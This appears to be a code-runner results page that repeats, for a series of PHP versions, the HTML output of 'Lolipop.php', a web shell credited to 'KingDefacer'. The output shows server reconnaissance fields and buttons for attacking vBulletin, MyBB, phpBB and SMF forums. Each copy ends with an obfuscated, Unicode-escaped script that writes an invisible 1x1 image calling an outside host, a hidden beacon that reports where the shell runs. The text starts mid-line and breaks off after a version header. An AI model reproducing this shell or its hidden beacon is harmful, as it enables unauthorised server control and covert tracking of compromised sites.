x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.2
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.2</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.1
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.1</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.0.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.0.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.38
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.38</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.37
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.37</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.36
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.36</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.35
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.35</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.34
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.34</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.33
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.33</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.32
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.32</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.31
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.31</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.30
